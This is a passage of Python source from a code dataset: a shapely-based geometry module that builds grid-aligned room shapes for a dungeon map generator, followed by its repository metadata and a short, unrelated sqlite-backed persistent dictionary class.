"""Convert a diagonal line of length sqrt(2)/2 * X to a cardinal line
of length X
"""
assert isinstance(new_orientation, Direction)
base_line = line(base_line)
base_dir = Direction.normal_to(base_line)
if base_dir.angle_from(new_orientation) > 90:
base_dir = base_dir.rotate(180)
assert not base_dir.is_cardinal() and new_orientation.is_cardinal()
log.debug("Changing base line {0} from {1} to {2}"
.format(to_string(base_line), base_dir, new_orientation))
(x0, y0, x1, y1) = base_line.bounds
# Construct the first endpoint
if base_dir.vector[0] > 0:
if new_orientation.vector[0] > 0:
xa = math.ceil(x1/10) * 10
else:
xa = math.ceil(x0/10) * 10
else:
if new_orientation.vector[0] < 0:
xa = math.floor(x0/10) * 10
else:
xa = math.floor(x1/10) * 10
if base_dir.vector[1] > 0:
if new_orientation.vector[1] > 0:
ya = math.ceil(y1/10) * 10
else:
ya = math.ceil(y0/10) * 10
else:
if new_orientation.vector[1] < 0:
ya = math.floor(y0/10) * 10
else:
ya = math.floor(y1/10) * 10
log.debug("first point: {0}, {1}".format(xa, ya))
new_width = 2 * (x1 - x0) # or y1 - y0
# Construct the second endpoint
xb = xa + new_orientation.vector[1] * (2 * (y1 - y0))
yb = ya + new_orientation.vector[0] * (2 * (x1 - x0))
log.debug("second point: {0}, {1}".format(xb, yb))
new_line = line((xa, ya), (xb, yb))
log.info("new line is {0}".format(to_string(new_line)))
return new_line
def endpoints_by_direction(line, dir):
"""Return the (closer, farther) endpoints of the given line relative
to the given direction.
"""
(point1, point2) = list(line.boundary)
weight = ((point1.x - point2.x) * dir.vector[0] +
(point1.y - point2.y) * dir.vector[1])
if weight > 0:
return (point1, point2)
elif weight < 0:
return (point2, point1)
else:
raise RuntimeError("Unable to decide between {0} and {1} to the {2}"
.format(to_string(point1), to_string(point2), dir))
def point_sweep(point, dx_or_dir, dy_or_dist):
"""Moves the given point and constructs a line segment between the two.
Returns the constructed line
"""
point2 = translate(point, dx_or_dir, dy_or_dist)
new_line = line(point, point2)
return new_line
def sweep(base_line, dir, distance, base_dir=None, width=None):
"""Sweep the given line in the given direction for the given distance.
Returns the tuple (polygon, new_line) where polygon is the polygon defined
by the swept line, and new_line is the final line position.
"""
assert isinstance(dir, Direction)
# line can be a LineString object or simply a list of coords
line1 = line(base_line)
line2 = translate(line1, dir, distance)
poly2 = loft(line1, line2)
log.debug("Swept polygon from {0} to the {1} by {2}: {3}"
.format(to_string(line1), dir, distance,
to_string(poly2)))
return (poly2, line2)
def loft(*args):
"""Construct a polygon from the given linear cross-sections.
---- ----_
/ / -_
---> \ -
----- \ -----
/ \/
"""
lines = list(args)
line1 = lines.pop(0)
assert line1.length > 0
polys = []
while len(lines) > 0:
line2 = lines.pop(0)
assert line2.length > 0
log.debug("Constructing a polygon between {0} and {1}"
.format(to_string(line1), to_string(line2)))
poly = None
# Degenerate cases first
if line1.crosses(line2):
log.warning("trying to loft but line1 {0} crosses line2 {1} at {2}"
.format(to_string(line1), to_string(line2),
to_string(line1.intersection(line2))))
# fallthru to default case at end
elif line1.contains(line2):
poly = line1
elif line2.contains(line1):
poly = line2
elif line1.boundary.intersects(line2.boundary):
log.debug("The two lines share an endpoint - merging them")
poly1 = Polygon(shapely.ops.linemerge([line1, line2]))
if poly1.is_valid:
poly = poly1
else:
log.warning("line1 and line2 share an endpoint but "
"cannot be merged: {0}"
.format(shapely.validation.explain_validity(poly1)))
else:
# The lines do not touch, so we can just skin between them:
if poly is None and (not line(line1.boundary[0], line2.boundary[0])
.crosses(line(line1.boundary[1],
line2.boundary[1]))):
poly1 = (Polygon(list(line1.coords) +
list(reversed(line2.coords))))
if poly1.is_valid:
poly = poly1
if poly is None and (not line(line1.boundary[0], line2.boundary[1])
.crosses(line(line1.boundary[1],
line2.boundary[0]))):
poly1 = (Polygon(list(line1.coords) +
list(line2.coords)))
if poly1.is_valid:
poly = poly1
if poly is None:
log.warning("Unable to loft intuitively between {0} and {1}"
.format(to_string(line1), to_string(line2)))
poly1 = union(line1, line2).convex_hull
if poly1.is_valid:
poly = poly1
log.debug("Constructed {0}".format(to_string(poly)))
if poly is not None:
polys.append(poly)
line1 = line2
return shapely.ops.cascaded_union(polys)
def loft_to_grid(base_line, dir, width):
"""Construct the resulting shape needed to connect the given line to
the appropriate grid points in the given direction.
Returns the tuple (aligned_line, lofted_polygon).
In some cases there may be more than one plausible way to do this lofting;
if so, the one chosen will be the lofted_polygon with the least area.
"""
assert isinstance(dir, Direction)
base_line = line(base_line)
log.info("Lofting {0} to the {1} to align to the grid"
.format(to_string(base_line), dir))
(p1, p2) = base_line.boundary
if dir.is_cardinal():
divisor = 10
else:
divisor = 5
(p1, p2) = endpoints_by_direction(base_line, dir.rotate(90))
if dir.vector[0] < 0:
x1 = math.floor(p1.x / divisor) * divisor
x2 = math.floor(p2.x / divisor) * divisor
elif dir.vector[0] > 0:
x1 = math.ceil(p1.x / divisor) * divisor
x2 = math.ceil(p2.x / divisor) * divisor
else:
x1 = round(p1.x / divisor) * divisor
x2 = round(p2.x / divisor) * divisor
if dir.vector[1] < 0:
y1 = math.floor(p1.y / divisor) * divisor
y2 = math.floor(p2.y / divisor) * divisor
elif dir.vector[1] > 0:
y1 = math.ceil(p1.y / divisor) * divisor
y2 = math.ceil(p2.y / divisor) * divisor
else:
y1 = round(p1.y / divisor) * divisor
y2 = round(p2.y / divisor) * divisor
p1 = point(x1, y1)
p2 = point(x2, y2)
candidate_1 = point_sweep(p1, dir.rotate(-90), width)
candidate_2 = point_sweep(p2, dir.rotate(90), width)
# TODO - intermediate possibilities?
while (sweep(candidate_1, dir, 50)[0].crosses(base_line) or
sweep(candidate_1, dir, 50)[0].contains(base_line)):
candidate_1 = translate(candidate_1, dir, 10)
while (sweep(candidate_2, dir, 50)[0].crosses(base_line) or
sweep(candidate_2, dir, 50)[0].contains(base_line)):
candidate_2 = translate(candidate_2, dir, 10)
poly1 = loft(base_line, candidate_1)
poly2 = loft(base_line, candidate_2)
log.debug("First candidate: {0}, {1}"
.format(to_string(candidate_1), poly1.area))
log.debug("Second candidate: {0}, {1}"
.format(to_string(candidate_2), poly2.area))
if (poly1.area < poly2.area or (poly1.area == poly2.area and
poly1.length < poly2.length)):
candidate_line = candidate_1
poly = poly1
else:
candidate_line = candidate_2
poly = poly2
log.info("New line is {0}".format(to_string(candidate_line)))
return (candidate_line, poly)
def find_edge_segments(poly, width, direction):
"""Find grid-constrained line segments along the border of the given polygon
in the given direction with the given width.
Returns a list of zero or more line segments.
"""
log.info("Finding line segments (width {0}) along the {1} edge of {2}"
.format(width, direction, to_string(poly)))
assert isinstance(direction, Direction)
border = line_loop(poly.exterior.coords)
(xmin, ymin, xmax, ymax) = poly.bounds
if direction == Direction.N or direction == Direction.S:
inter_box = box(math.floor(xmin/10)*10, ymin - 10,
math.floor(xmin/10)*10 + width, ymax + 10)
offset = Direction.E
def check_width(intersection):
w = intersection.bounds[2] - intersection.bounds[0]
return w >= width
def check_size(intersection, size):
# Make sure width matches "size" and height not too much
w = intersection.bounds[2] - intersection.bounds[0]
h = intersection.bounds[3] - intersection.bounds[1]
return (math.fabs(w - size) < 0.1 and h < size)
if direction[1] > 0: #north
def prefer(option_a, option_b):
return (option_a.bounds[3] > option_b.bounds[3] or (
option_a.bounds[3] == option_b.bounds[3] and
option_a.bounds[1] > option_b.bounds[1]))
else: # south
def prefer(option_a, option_b):
return (option_a.bounds[1] < option_b.bounds[1] or (
option_a.bounds[1] == option_b.bounds[1] and
option_a.bounds[3] < option_b.bounds[3]))
elif direction == Direction.W or direction == Direction.E:
inter_box = box(xmin - 10, math.floor(ymin/10)*10,
xmax + 10, math.floor(ymin/10)*10 + width)
offset = Direction.N
def check_width(intersection):
h = intersection.bounds[3] - intersection.bounds[1]
return h >= width
def check_size(intersection, size):
# Make sure height matches "size" and width not too much
w = intersection.bounds[2] - intersection.bounds[0]
h = intersection.bounds[3] - intersection.bounds[1]
return (math.fabs(h - size) < 0.1 and w < size)
if direction[0] < 0: #west
def prefer(option_a, option_b):
return (option_a.bounds[0] < option_b.bounds[0] or (
option_a.bounds[0] == option_b.bounds[0] and
option_a.bounds[2] < option_b.bounds[2]))
else: # east
def prefer(option_a, option_b):
return (option_a.bounds[2] > option_b.bounds[2] or (
option_a.bounds[2] == option_b.bounds[2] and
option_a.bounds[0] > option_b.bounds[0]))
elif direction == Direction.NW or direction == Direction.SE:
line1 = point_sweep(point(math.floor(xmin/10) * 10,
math.ceil(ymax/10) * 10), Direction.NE, 2000)
line2 = point_sweep(point(math.ceil(xmax/10) *10,
math.floor(ymin/10) * 10), Direction.NE, 2000)
line3 = point_sweep(point(math.ceil(xmax/10) * 10,
math.ceil(ymax/10) * 10), Direction.NW, 2000)
line4 = point_sweep(point(math.ceil(xmax/10) * 10,
math.ceil(ymax/10) * 10), Direction.SE, 2000)
point1 = intersect(line1, line3)
if not isinstance(point1, Point):
raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
.format(to_string(line1), to_string(line3),
point1))
point2 = intersect(line2, line4)
if not isinstance(point2, Point):
raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
.format(to_string(line2), to_string(line4),
point2))
point3 = translate(point2, Direction.SW, width)
point4 = translate(point1, Direction.SW, width)
inter_box = polygon([point1, point2, point3, point4])
log.debug("inter_box: {0}".format(to_string(inter_box)))
offset = Direction.SW
def check_width(intersection):
l = ((intersection.bounds[2] - intersection.bounds[0]) +
(intersection.bounds[3] - intersection.bounds[1]))
return l >= width
def check_size(intersection, size):
w = intersection.bounds[2] - intersection.bounds[0]
h = intersection.bounds[3] - intersection.bounds[1]
return (h > 0 and w > 0 and math.fabs(w + h - size) < 0.1)
if direction[1] > 0: #north
def prefer(option_a, option_b):
return (option_a.bounds[1] > option_b.bounds[1] or (
option_a.bounds[1] == option_b.bounds[1] and
option_a.bounds[3] > option_b.bounds[3]))
else: # south
def prefer(option_a, option_b):
return (option_a.bounds[3] < option_b.bounds[3] or (
option_a.bounds[3] == option_b.bounds[3] and
option_a.bounds[1] < option_b.bounds[1]))
elif direction == Direction.NE or direction == Direction.SW:
line1 = point_sweep(point(math.floor(xmin/10) * 10,
math.floor(ymin/10) * 10), Direction.NW, 2000)
line2 = point_sweep(point(math.ceil(xmax/10) * 10,
math.ceil(ymax/10) * 10), Direction.NW, 2000)
line3 = point_sweep(point(math.floor(xmin/10) * 10,
math.ceil(ymax/10) * 10), Direction.SW, 2000)
line4 = point_sweep(point(math.floor(xmin/10) * 10,
math.ceil(ymax/10) * 10), Direction.NE, 2000)
point1 = intersect(line1, line3)
if not isinstance(point1, Point):
raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
.format(to_string(line1), to_string(line3),
point1))
point2 = intersect(line2, line4)
if not isinstance(point2, Point):
raise RuntimeError("Intersection of {0} and {1} is {2}, not a Point"
.format(to_string(line2), to_string(line4),
point2))
point3 = translate(point2, Direction.SE, width)
point4 = translate(point1, Direction.SE, width)
inter_box = polygon([point1, point2, point3, point4])
log.debug("inter_box: {0}".format(to_string(inter_box)))
offset = Direction.SE
def check_width(intersection):
l = ((intersection.bounds[2] - intersection.bounds[0]) +
(intersection.bounds[3] - intersection.bounds[1]))
return l >= width
def check_size(intersection, size):
w = intersection.bounds[2] - intersection.bounds[0]
h = intersection.bounds[3] - intersection.bounds[1]
return (h > 0 and w > 0 and math.fabs(w + h - size) < 0.1)
if direction[1] > 0: #north
def prefer(option_a, option_b):
return (option_a.bounds[1] > option_b.bounds[1] or (
option_a.bounds[1] == option_b.bounds[1] and
option_a.bounds[3] > option_b.bounds[3]))
else: # south
def prefer(option_a, option_b):
return (option_a.bounds[3] < option_b.bounds[3] or (
option_a.bounds[3] == option_b.bounds[3] and
option_a.bounds[1] < option_b.bounds[1]))
log.debug("box: {0}, offset: {1}".format(to_string(inter_box), offset))
candidates = []
if (inter_box.contains(poly) and not inter_box.equals(poly) and
not hasattr(inter_box.difference(poly), "geoms")):
log.warning("Box {0} contains poly {1}!"
.format(to_string(inter_box), to_string(poly)))
return candidates
first_hit = False
while True:
intersection = intersect(inter_box, border)
log.debug("intersection: {0}".format(to_string(intersection)))
if intersection.length == 0:
if not first_hit:
# We're not there yet - just move closer
inter_box = translate(inter_box, offset, 10)
continue
else:
# We've crossed the shape and exited the other side
break
best = None
first_hit = True
diff = differ(inter_box, poly)
if not hasattr(diff, "geoms"):
log.info("Not a complete intersection? {0}"
.format(to_string(diff)))
inter_box = translate(inter_box, offset, 10)
continue
if not hasattr(intersection, "geoms"):
intersection = [intersection]
segments = []
for segment in intersection:
segments += minimize_line(segment, check_width)
intersection = segments
log.debug("Intersection: {0}"
.format([to_string(x) for x in intersection]))
for linestring in intersection:
if best is None or prefer(linestring, best):
if best is not None:
log.info("Preferring {0} over {1}"
.format(to_string(linestring),
to_string(best)))
best = linestring
inter_box = translate(inter_box, offset, 10)
if best is None:
log.debug("No valid candidate found")
continue
elif not check_size(best, width):
log.debug("Best-fit {0} failed check_size() check against {1}"
.format(to_string(best), width))
continue
log.info("Found section: {0}".format(to_string(best)))
candidates.append(best)
log.info("Found {0} candidate edges: {1}"
.format(len(candidates), [to_string(c) for c in candidates]))
return candidates
def trim(shape, trimmer, adjacent_shape):
"""Trims the given 'shape' until it is a single continuous region that
does not overlap 'trimmer'. If a simple difference operation between 'shape'
and 'trimmer' would result in multiple disconnected fragments, keep
the fragment (if any) that will remain adjacent to 'adjacent_shape'.
"""
if not (isinstance(shape, Polygon) or
isinstance(shape, MultiPolygon) or
isinstance(shape, GeometryCollection)):
raise TypeError("shape is {0}".format(type(shape)))
log.debug("Trimming {0} with {1}, adjacent to {2}"
.format(to_string(shape), to_string(trimmer),
to_string(adjacent_shape)))
difference = differ(shape, trimmer)
log.debug("Difference is {0}".format(to_string(difference)))
match = None
# Handle the case where the polygon was split by existing geometry:
if (type(difference) is GeometryCollection or
type(difference) is MultiPolygon):
log.debug("Trimming shape split it into {0} pieces"
.format(len(difference.geoms)))
for geom in difference.geoms:
if type(geom) is Polygon:
if geom.intersects(adjacent_shape):
match = geom
break
elif type(difference) is Polygon:
if difference.intersects(adjacent_shape):
match = difference
else:
log.warning("{0} does not intersect {1}"
.format(to_string(difference),
to_string(adjacent_shape)))
if match is not None:
log.debug("Trimmed shape to fit")
if match.area > 0:
match = match.simplify(0)
# TODO? force all coordinates in match to snap to 1' grid
else:
log.debug("After trimming, shape is nonexistent")
return match
def minimize_line(base_line, validator):
"""Trim the given line from both ends to the minimal line(s) that
satisfy the given validator function. If the base line does not satisfy
the validator, returns a list of this line alone; otherwise, returns
a list of 1 or 2 sub-segments that satisfy this criteria.
For example:
Given the line below and a validator that enforces a minimum width of 3:
.-- ---
|
| --->
'-- ---
Given the same line and a validator that enforces a minimum height of 4:
.-- |
| |
| ---> |
'-- |
"""
if not validator(base_line):
log.info("Base line {0} does not satisfy validator"
.format(to_string(base_line)))
return [base_line]
# First line: delete from end, then from beginning
coords = list(base_line.coords)
while (len(coords) > 2):
tmp_line = line(coords[:-1])
if not validator(tmp_line):
break
coords = coords[:-1]
while (len(coords) > 2):
tmp_line = line(coords[1:])
if not validator(tmp_line):
break
coords = coords[1:]
line1 = line(coords)
# Second line: delete from beginning, then from end
coords = list(base_line.coords)
while (len(coords) > 2):
tmp_line = line(coords[1:])
if not validator(tmp_line):
break
coords = coords[1:]
while (len(coords) > 2):
tmp_line = line(coords[:-1])
if not validator(tmp_line):
break
coords = coords[:-1]
line2 = line(coords)
if line1.equals(line2):
if line1.equals(base_line):
log.debug("Line {0} cannot be minimized any further"
.format(to_string(base_line)))
return [base_line]
else:
log.debug("Minimized line {0} to {1}"
.format(to_string(base_line), to_string(line1)))
return [line1]
else:
log.debug("Minimized line {0} to {1} and {2}"
.format(to_string(base_line), to_string(line1),
to_string(line2)))
return [line1, line2]
# Polygon construction functions
def point(x, y):
"""Represent a point"""
return Point(x, y)
def line(*coords):
"""Construct a line segment from the given coordinate sequence.
"""
if len(coords) == 1:
coords = coords[0]
if isinstance(coords, LineString):
line = coords
elif len(coords) > 0:
if isinstance(coords[0], Point):
coords = [(point.x, point.y) for point in coords]
line = LineString(coords)
else:
raise RuntimeError("Don't know how to construct a line segment from {0}"
.format(coords))
assert line.is_valid, ("{0} does not yield a valid line: {1}"
.format(to_string(coords),
shapely.validation.explain_validity(line)))
return line
def line_loop(coords):
"""Constructs a linear loop from the given coordinate sequence
(implicitly connecting end and start if needed).
"""
loop = LinearRing(coords)
assert loop.is_valid, ("{0} does not yield a valid line: {1}"
.format(to_string(Coords),
shapely.validation.explain_validity(loop)))
return loop
def polygon(coords=None):
"""Construct a polygon from the given coordinate sequence or list of points.
"""
if isinstance(coords, Polygon):
poly = coords
elif coords is None:
poly = Polygon()
elif type(coords) is list:
if isinstance(coords[0], Point):
coords = [(point.x, point.y) for point in coords]
poly = Polygon(coords)
else:
raise RuntimeError("Not sure how to create Polygon from {0}"
.format(coords))
assert poly.is_valid, ("{0} does not yield a valid polygon: {1}"
.format(to_string(coords),
shapely.validation.explain_validity(poly)))
return poly
def lines_to_coords(lines):
"""Convert the given line or group of lines to a list of
lists of coordinates.
"""
coords_list = []
if lines.is_empty:
log.info("No points in lines {0}".format(to_string(lines)))
elif isinstance(lines, LineString):
coords_list.append(list(lines.coords))
elif isinstance(lines, MultiLineString):
for geom in lines.geoms:
coords_list.append(list(geom.coords))
else:
raise RuntimeError("Unexpected shape {0}".format(to_string(lines)))
log.debug("{0} has coords: {1}".format(to_string(lines), coords_list))
return coords_list
def box(xmin, ymin, xmax, ymax):
"""Construct a rectangle within the given bounds"""
return shapely.geometry.box(xmin, ymin, xmax, ymax)
def rectangle_list(width, height):
"""Construct a list of 2 (for rectangles) or 1 (for squares) rectangles
constrained to the grid with the given width and height.
"""
rect = polygon([(0, 0), (width, 0), (width, height), (0, height)])
rect_list = [rect]
if width != height:
rect = shapely.affinity.rotate(rect, 90, origin=(0,0))
rect_list.append(rect)
return rect_list
def circle(area):
"""Construct an approximately circular polygon constrained to the grid
but with approximately the requested area.
"""
radius = math.sqrt(area / math.pi)
log.info("Exact radius would be {0}".format(radius))
# Constrain radius to grid in cardinal direction
cardinal_radius = 5 * round(radius/5, 0)
# Constrain radius to grid in diagonal direction
diagonal_radius = 7 * round(radius/7, 0)
# Pick whichever one is closer to ideal
if (math.fabs(radius - diagonal_radius) <
math.fabs(radius - cardinal_radius)):
radius = diagonal_radius
else:
radius = cardinal_radius
log.info("Rounded radius to {0} or {1} --> chose {2}"
.format(cardinal_radius, diagonal_radius, radius))
if radius % 10 == 0 or radius % 14 == 0:
# For even radius, center around a grid intersection
circle = Point(0, 0).buffer(radius - 0.1)
else:
# For odd radius, center around a grid square
circle = Point(5, 5).buffer(radius - 0.1)
return circle
def polygon_circle(area):
"""Construct a grid-constrained polygon (45-degree angles only)
that roughly approximates a circle. Uses the midpoint circle algorithm.
"""
radius = math.sqrt(area / math.pi)
grid_radius = 5 * round(radius/5, 0)
log.info("Exact radius would be {0}; rounded to {1}"
.format(radius, grid_radius))
if grid_radius % 10 == 0:
# For even radius, center around a grid intersection
x0 = y0 = 0
else:
# For odd radius, center around a grid square
x0 = y0 = 5
x = grid_radius
y = 0
error = 10 - x
point_list = []
while x >= y:
point_list.append((x, y))
if error < 0:
y += 10
error += 2 * y + 10
else:
y += 10
x -= 10
error += 2 * (y - x + 10)
points = [(x + x0, y + y0) for (x, y) in point_list]
points += [(y + x0, x + y0) for (x, y) in reversed(point_list)]
points += [(-y + x0, x + y0) for (x, y) in point_list]
points += [(-x + x0, y + y0) for (x, y) in reversed(point_list)]
points += [(-x + x0, -y + y0) for (x, y) in point_list]
points += [(-y + x0, -x + y0) for (x, y) in reversed(point_list)]
points += [(y + x0, -x + y0) for (x, y) in point_list]
points += [(x + x0, -y + y0) for (x, y) in reversed(point_list)]
circ = Polygon(points)
log.debug("Circle with area {0}: {1}".format(area, to_string(circ)))
return circ
def circle_list(area):
return [circle(area)]
def isosceles_right_triangle(area):
"""Construct an isosceles right triangle constrained to the grid but
with approximately the requested area.
"""
ideal_size = math.sqrt(area * 2)
log.info("Ideal size would be {0}".format(ideal_size))
size = round(ideal_size, -1)
log.info("Rounded size to {0}".format(size))
return polygon([(0, 0), (size, 0), (0, size)])
def triangle_list(area, rotate=True):
"""Returns the list of possible right triangles (each orientation)
with approximately the requested area.
"""
triangle = isosceles_right_triangle(area)
if rotate:
return [triangle,
shapely.affinity.rotate(triangle, 90),
shapely.affinity.rotate(triangle, 180),
shapely.affinity.rotate(triangle, 270)]
return [triangle]
def trapezoid_list(area, rotate_and_mirror=True):
"""Returns a list of possible trapezoids (various height/width ratios,
various orientations) with approximately the requested area.
We support two kinds of trapezoids:
w1 w2
|----\ /--\
h | \ and h / \
|------\ /------\
both with nice 45 degree angles.
In theory, these can vary widely in their aspect ratio:
w=10 h=10
|-\ |----\
| \ vs. |-----\
| \
|----\
To keep the number of permutations reasonable, we will only consider
variants where the ratio of width to height is "pleasing".
This ratio is very much arbitrary and hand-tuned.
"""
log.info("Generating list of trapezoids with area {0}".format(area))
trapezoids = []
for h in range(int(10 * math.ceil(math.sqrt(area/2) / 10)),
int(10 * math.ceil(math.sqrt(area * 3/2) / 10)), 10):
w1 = round((area / h) - (h / 2), -1)
w2 = round((area / h) - h, -1)
log.debug("Candidates: one-sided {w1} x {h}, two-sided {w2} x {h}"
.format(w1=w1, w2=w2, h=h))
# w1 is larger than w2, so if it's too small we know we're done
if w1 < 10:
break
if w1 >= 10 and (2 * w1 >= h):
# one-sided trapezoid - 8 possible orientations
trapezoid = polygon([(0, 0), (w1 + h, 0), (w1, h), (0, h)])
log.debug("one-sided trapezoid: {0}, area {1}"
.format(to_string(trapezoid), trapezoid.area))
trapezoids.append(trapezoid)
if rotate_and_mirror:
trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
origin=(0, 0)))
trapezoid = shapely.affinity.scale(trapezoid, xfact=-1.0)
trapezoids.append(trapezoid)
trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
origin=(0, 0)))
if w2 >= 10 and (3 * w2) >= h:
# two-sided trapezoid - 4 possible orientations
trapezoid = polygon([(0, 0), (h + w2 + h, 0), (h + w2, h), (h, h)])
log.debug("two-sided trapezoid: {0} area {1}"
.format(to_string(trapezoid), trapezoid.area))
trapezoids.append(trapezoid)
if rotate_and_mirror:
trapezoids.append(shapely.affinity.rotate(trapezoid, 90,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 180,
origin=(0, 0)))
trapezoids.append(shapely.affinity.rotate(trapezoid, 270,
origin=(0, 0)))
return trapezoids
def oval_list(area, rotate=True):
"""Construct a list of ovals (actually, capsule shapes) that are
grid-constrained but have approximately the requested area.
"""
# Ovals are a pain to calculate and not likely to fit nicely into
# a map in any case. Instead, we'll construct a capsule-shaped room:
# -------
# / \
#| |
# \ /
# -------
#
# The area of such a room is w * h + pi * (h/2)^2
# or area = h * (w + (pi/4 * h))
# area ~= h * (w + 0.75h)
# area / h ~= w + 0.75h
# w ~= area / h - 0.75h
#
# For w = h, area = 5/4 pi * h^2 ~= 4 h^2
# For h = 10, w ~= area/10 - 10
# For w = 10, area ~= a circle
ovals = []
for h in range(int(10 * math.ceil(math.sqrt(area/4) / 10)),
int(10 * math.ceil(math.sqrt(area) / 10)),
10):
w = round(area / h - ((math.pi / 4) * h), -1)
log.info("Candidate: {w} x {h} ({w}+{h} x {h})".format(w=w, h=h))
if h % 20 == 0:
offset = 0
else:
offset = 5
circle = point(w - 0.01 + offset, offset).buffer(h/2, resolution=16)
# circle is a set of (16 * 4 + 1) points counterclockwise from (x, 0)
left_arc = line([(offset, -h/2 + offset)] +
translate(circle, -w + 0.02, 0).exterior.coords[17:48] +
[(offset, h/2 + offset)])
right_arc = line([(w + offset, h/2 + offset)] +
circle.exterior.coords[49:] +
circle.exterior.coords[0:16] +
[(w + offset, -h/2 + offset)])
oval = loft(left_arc, right_arc)
ovals.append(oval)
if rotate:
ovals.append(shapely.affinity.rotate(oval, 90, origin=(0,0)))
return ovals
def hexagon_list(area, rotate=True):
"""Construct a list of hexagons that are grid-constrained but have
approximately the requested area.
Note that these "hexagons" have 45-degree angles only, and may vary in their
width-to-height ratio:
--- ------ /\
/ \ / \ | |
\ / \ / | |
--- ------ \/
The range of w/h ratios generated is arbitrary and hand-tuned
to generate visually pleasing results.
"""
# We start with a rectangle of size w*h then add triangles of size
# h/2*h to either side, so the overall area is (w*h + 2 (1/2 * h * h/2))
# = w * h + h^2/2. Just like the "one-sided" trapezoid above...
hexagons = []
for h in range(int(10 * math.ceil(math.sqrt(area * 2/3) / 10)),
int(10 * math.ceil(math.sqrt(area * 3/2) / 10)), 10):
w = round((area / h) - (h / 2), -1)
log.debug("Constructing hexagon with width {w} and height {h}"
.format(w=w, h=h))
if w < 10:
break
if h % 20 == 0:
offset = 0
else:
offset = 5
hexagon = polygon([(h/2 + offset, 0), (offset, h/2),
(h/2 + offset, h), (h/2 + w + offset, h),
(h + w + offset, h/2), (h/2 + w + offset, 0)])
hexagons.append(hexagon)
if rotate:
hexagons.append(shapely.affinity.rotate(hexagon, 90, origin=(0, 0)))
return hexagons
def octagon_list(area):
"""Construct a list of octagons that are grid-constrained but have
approximately the requested area.
An "octagon" can potentially vary anywhere from:
/---\ /-\
| | / \
| | to | |
| | \ /
\---/ \-/
For now we try to construct a reasonably "ideal" octagon
only, but we could consider more variants later... TODO?
"""
sq_area = area * 9 / 7
sq_size = math.sqrt(sq_area)
size = round(sq_size, -1)
log.info("Ideal size would be {0}, rounded to {1}"
.format(sq_size, size))
corner_offset = 10 * math.floor(size / 30)
octagon = polygon([(0, corner_offset), (0, size - corner_offset),
(corner_offset, size), (size - corner_offset, size),
(size, size - corner_offset), (size, corner_offset),
(size - corner_offset, 0), (corner_offset, 0)])
return [octagon]
# Geometric interaction
def union(*args):
"""Union the provided shapes and clean up the result as needed.
"""
if len(args) == 1:
args = args[0]
union = shapely.ops.cascaded_union(args)
union = union.simplify(0)
return union
def intersect(geometry_1, geometry_2):
"""Intersect the two given shapes and clean up the result as needed.
"""
intersection = geometry_1.intersection(geometry_2)
if intersection.is_empty:
return intersection
log.debug("Naive intersection is {0}".format(to_string(intersection)))
if intersection.area == 0 and intersection.length > 0:
# Intersection is a line segment(s)
# These are sometimes fragmented unnecessarily into multiple
# pieces (points and/or linestrings). Try to reunite them
# using linemerge()
if hasattr(intersection, "geoms"):
line_list = []
for geom in intersection.geoms:
# Linemerge doesn't like points, so only try to
# merge line segments
if geom.length > 0:
line_list.append(geom)
intersection = shapely.ops.linemerge(line_list)
log.debug("Cleaned up intersection is {0}"
.format(to_string(intersection)))
return intersection
def differ(geometry_1, geometry_2):
"""Take the difference of the two given shapes and clean up
the result as needed.
"""
difference = geometry_1.difference(geometry_2)
if difference.is_empty:
return difference
log.debug("Naive difference is {0}".format(to_string(difference)))
if difference.area > 0 and not difference.is_valid:
# The resulting polygon may be overly complex - simplify it
# if we can.
difference = difference.buffer(0)
log.debug("Cleaned up difference is {0}".format(to_string(difference)))
assert difference.is_valid, ("difference of {0} and {1} is not valid: {2}"
.format(to_string(geometry_1),
to_string(geometry_2),
shapely.validation.explain_validity(difference)))
return difference
| {
"repo_name": "glennmatthews/aagen",
"path": "aagen/geometry.py",
"copies": "1",
"size": "56617",
"license": "mit",
"hash": 5207080264397008000,
"line_mean": 38.4543554007,
"line_max": 80,
"alpha_frac": 0.5547980289,
"autogenerated": false,
"ratio": 3.65766522385167,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47124632527516697,
"avg_score": null,
"num_lines": null
} |
"""A alternate implementation of the persistent dict found in
http://erezsh.wordpress.com/2009/05/24/filedict-a-persistent-dictionary-in-python/
"""
import sqlite3, UserDict, pickle
def key(k):
return hash(k), pickle.dumps(k)
class persistentDict(UserDict.DictMixin):
def __init__(self, filetable, d=None, **kwarg):
if isinstance(filetable, tuple):
filename, self._table = filetable
else:
filename = filetable
self._table = 'dict'
self._db = sqlite3.connect(filename)
self._db.execute('create table if not exists %s (hash integer, key blob, value blob);' % self._table)
self._db.execute('create index if not exists %s_index ON %s(hash);' % (self._table, self._table))
self._db.commit()
self.update(d, **kwarg)
def __getitem__(self, k):
v = self._db.execute('select value from %s where hash=? and key=?;' % self._table, key(k)).fetchone()
if v:
return pickle.loads(str(v[0]))
raise KeyError, k
def _setitem(self, (hkey, pkey), pval):
if self._contains((hkey, pkey)):
self._db.execute('update %s set value=? where hash=? and key=?' % self._table, (pval, hkey, pkey))
else:
self._db.execute('insert into %s values (?,?,?)' % self._table, (hkey, pkey, pval))
def __setitem__(self, k, v):
self._setitem(key(k), pickle.dumps(v))
self._db.commit()
def __delitem__(self, k):
if self._db.execute('delete from %s where hash=? and key=?;' % self._table, key(k)).rowcount <=0:
raise KeyError, k
self._db.commit()
def _contains(self, k):
res, = self._db.execute('select count(*) from %s where hash=? and key=?;' % self._table, k)
return res[0]>0
def __contains__(self, k):
return self._contains(key(k))
def __iter__(self):
for k, in self._db.execute('select key from '+self._table):
yield pickle.loads(str(k))
def keys(self):
return list(iter(self))
def insert(self, seq):
for k,v in seq:
self._setitem(key(k), pickle.dumps(v))
self._db.commit()
if __name__ == '__main__':
d = persistentDict((r'c:\bortest\db.dat', 'new'), k1=1)
d['k2'] = 1
d['k2'] = 2
try:
del d['k3']
except KeyError:
print 'OK'
print d.keys()
